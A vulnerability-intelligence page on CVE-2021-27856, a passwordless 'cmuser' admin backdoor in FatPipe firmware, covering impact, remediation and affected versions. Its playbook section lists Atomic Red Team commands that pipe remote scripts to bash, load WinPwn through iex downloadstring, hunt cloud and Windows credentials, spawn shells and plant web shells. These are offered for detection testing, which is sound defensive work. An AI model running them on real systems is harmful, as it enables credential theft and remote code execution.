CVE-2021-27856
Overview
This vulnerability is an authentication bypass caused by the presence of a default administrative account named "cmuser" without a password in FatPipe WARP, IPVPN, and MPVPN software. The root cause is the inclusion of this backdoor account in the firmware prior to versions 10.1.2r60p91 and 10.2.2r42. The affected component is the user authentication mechanism within the FatPipe networking software, which fails to enforce credential validation for this account.
Vulnerability Description
FatPipe WARP, IPVPN, and MPVPN software prior to versions 10.1.2r60p91 and 10.2.2r42 includes an account named "cmuser" that has administrative privileges and no password. Older versions of FatPipe software may also be vulnerable. The FatPipe advisory identifier for this vulnerability is FPSA002.
Impact
An attacker with network access can gain full administrative control over vulnerable FatPipe devices without authentication, enabling complete compromise of device configuration and network traffic management. This can lead to unauthorized data interception, manipulation, or denial of service. The attack requires no user interaction and no prior credentials, as indicated by the CVSS vector AV:N/AC:L/PR:N/UI:N, making exploitation trivial for an attacker with network reach to the device.
Solution
Remediation involves upgrading FatPipe WARP, IPVPN, and MPVPN software to versions 10.1.2r60p91 or later, or 10.2.2r42 or later as specified in advisory FPSA002 available at https://www.fatpipeinc.com/support/cve-list.php. The vendor’s advisory provides detailed patch instructions and recommends disabling or removing the "cmuser" account if present. Users should verify firmware versions and apply the official updates to eliminate this backdoor account.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in FatPipe's WARP, IPVPN, and MPVPN software arises from the presence of an administrative account named "cmuser" that is configured without a password. This oversight creates a significant security risk, as it allows unauthorized users to gain administrative access to the affected systems. The lack of a password for an account with such elevated privileges means that any individual with network access can exploit this vulnerability to manipulate configurations, access sensitive data, or disrupt services. The affected versions span multiple iterations of the software, indicating a widespread issue that could impact numerous deployments across various organizations.
Attack vectors for this vulnerability are alarmingly straightforward. An attacker could leverage network access to connect to the affected devices and authenticate as the "cmuser" account without needing any credentials. This could be achieved through various means, such as exploiting weak network segmentation, using social engineering tactics to gain access to the network, or even through physical access to devices in less secure environments. Once inside, an attacker could execute arbitrary commands, modify routing configurations, or even disable critical services, leading to potential data breaches or service outages. The simplicity of this attack vector makes it particularly concerning for organizations relying on these systems for their operations.
The real-world impact of this vulnerability can be profound, especially for businesses that depend on secure and reliable network infrastructure. Organizations utilizing FatPipe's software may face severe operational disruptions if an attacker exploits this vulnerability. The potential for data breaches could lead to regulatory fines, loss of customer trust, and significant damage to brand reputation. Moreover, the financial implications of a successful attack could be substantial, encompassing remediation costs, legal fees, and potential compensation claims from affected customers. Given the high CVSS score of 9.8, the urgency for organizations to address this vulnerability cannot be overstated.
Detection and mitigation strategies are critical in addressing this vulnerability. Organizations should first conduct a thorough inventory of their FatPipe installations to identify any systems running vulnerable versions of the software. Regular security audits and vulnerability assessments should be implemented to ensure that all software is up to date and that no unauthorized accounts exist. Additionally, organizations should enforce strict access controls and network segmentation to limit exposure to sensitive systems. Implementing multi-factor authentication (MFA) for administrative accounts can also significantly reduce the risk of unauthorized access. Finally, organizations should stay informed about security advisories from FatPipe and apply patches promptly to mitigate the risk of exploitation.
In conclusion, the vulnerability in FatPipe's software represents a critical security concern that requires immediate attention from affected organizations. The combination of an easily exploitable attack vector and the potential for severe business impact underscores the necessity for proactive security measures. By adopting robust detection and mitigation strategies, organizations can safeguard their network infrastructure and protect against the risks associated with this vulnerability.
CSURFACE threat intelligence has identified a significant increase in the Exploit Prediction Scoring System (EPSS) score for CVE-2021-27856, rising by over 50% to place it near the 99th percentile of predicted exploit likelihood. This shift indicates a heightened probability that threat actors may actively target this vulnerability in the near term, despite the absence of newly reported exploit tools or campaigns. The stable short-term trend suggests that this elevated risk level is sustained rather than transient. For defenders, this escalation underscores the urgency of prioritizing detection and mitigation efforts around FatPipe WARP deployments, as the vulnerability’s inherent ease of exploitation combined with administrative access via a default account continues to present a critical attack vector. While no fresh exploit details have emerged, the marked increase in EPSS reflects evolving attacker interest or potential preparatory activity that could precede exploitation attempts. Consequently, the overall threat level associated with CVE-2021-27856 should be considered heightened, warranting increased vigilance and monitoring within affected environments.
Affected Products (108)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Fatpipeinc | Ipvpn Firmware | 5.2.0 |
cpe:2.3:o:fatpipeinc:ipvpn_firmware:5.2.0:r34:*:*:*:*:*:*
|
|
|
Fatpipeinc | Ipvpn Firmware | 6.1.2 |
cpe:2.3:o:fatpipeinc:ipvpn_firmware:6.1.2:r70p26:*:*:*:*:*:*
|
|
|
Fatpipeinc | Ipvpn Firmware | 6.1.2 |
cpe:2.3:o:fatpipeinc:ipvpn_firmware:6.1.2:r70p45-m:*:*:*:*:*:*
|
|
|
Fatpipeinc | Ipvpn Firmware | 6.1.2 |
cpe:2.3:o:fatpipeinc:ipvpn_firmware:6.1.2:r70p75-m:*:*:*:*:*:*
|
|
|
Fatpipeinc | Ipvpn Firmware | 7.1.2 |
cpe:2.3:o:fatpipeinc:ipvpn_firmware:7.1.2:r39:*:*:*:*:*:*
|
|
|
Fatpipeinc | Ipvpn Firmware | 9.1.2 |
cpe:2.3:o:fatpipeinc:ipvpn_firmware:9.1.2:r129:*:*:*:*:*:*
|
|
|
Fatpipeinc | Ipvpn Firmware | 9.1.2 |
cpe:2.3:o:fatpipeinc:ipvpn_firmware:9.1.2:r144:*:*:*:*:*:*
|
|
|
Fatpipeinc | Ipvpn Firmware | 9.1.2 |
cpe:2.3:o:fatpipeinc:ipvpn_firmware:9.1.2:r150:*:*:*:*:*:*
|
|
|
Fatpipeinc | Ipvpn Firmware | 9.1.2 |
cpe:2.3:o:fatpipeinc:ipvpn_firmware:9.1.2:r156:*:*:*:*:*:*
|
|
|
Fatpipeinc | Ipvpn Firmware | 9.1.2 |
cpe:2.3:o:fatpipeinc:ipvpn_firmware:9.1.2:r161p12:*:*:*:*:*:*
|
|
|
Fatpipeinc | Ipvpn Firmware | 9.1.2 |
cpe:2.3:o:fatpipeinc:ipvpn_firmware:9.1.2:r161p16:*:*:*:*:*:*
|
|
|
Fatpipeinc | Ipvpn Firmware | 9.1.2 |
cpe:2.3:o:fatpipeinc:ipvpn_firmware:9.1.2:r161p17:*:*:*:*:*:*
|
|
|
Fatpipeinc | Ipvpn Firmware | 9.1.2 |
cpe:2.3:o:fatpipeinc:ipvpn_firmware:9.1.2:r161p2:*:*:*:*:*:*
|
|
|
Fatpipeinc | Ipvpn Firmware | 9.1.2 |
cpe:2.3:o:fatpipeinc:ipvpn_firmware:9.1.2:r161p20:*:*:*:*:*:*
|
|
|
Fatpipeinc | Ipvpn Firmware | 9.1.2 |
cpe:2.3:o:fatpipeinc:ipvpn_firmware:9.1.2:r161p26:*:*:*:*:*:*
|
|
|
Fatpipeinc | Ipvpn Firmware | 9.1.2 |
cpe:2.3:o:fatpipeinc:ipvpn_firmware:9.1.2:r161p3:*:*:*:*:*:*
|
|
|
Fatpipeinc | Ipvpn Firmware | 9.1.2 |
cpe:2.3:o:fatpipeinc:ipvpn_firmware:9.1.2:r164:*:*:*:*:*:*
|
|
|
Fatpipeinc | Ipvpn Firmware | 9.1.2 |
cpe:2.3:o:fatpipeinc:ipvpn_firmware:9.1.2:r164p4:*:*:*:*:*:*
|
|
|
Fatpipeinc | Ipvpn Firmware | 9.1.2 |
cpe:2.3:o:fatpipeinc:ipvpn_firmware:9.1.2:r164p5:*:*:*:*:*:*
|
|
|
Fatpipeinc | Ipvpn Firmware | 9.1.2 |
cpe:2.3:o:fatpipeinc:ipvpn_firmware:9.1.2:r165:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
0 eventsNo threat activity recorded for this CVE.
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns
No CAPEC pattern mapped to this CVE.
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (4)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2021-27856 |
| zeroscience.mk |
GitHub CVE
x_refsource_MISC
|
https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5684.php |
| fatpipeinc.com |
GitHub CVE
x_refsource_CONFIRM
|
https://www.fatpipeinc.com/support/cve-list.php |
| zeroscience.mk |
GitHub CVE
x_refsource_MISC
|
https://www.zeroscience.mk/codes/fatpipe_backdoor.txt |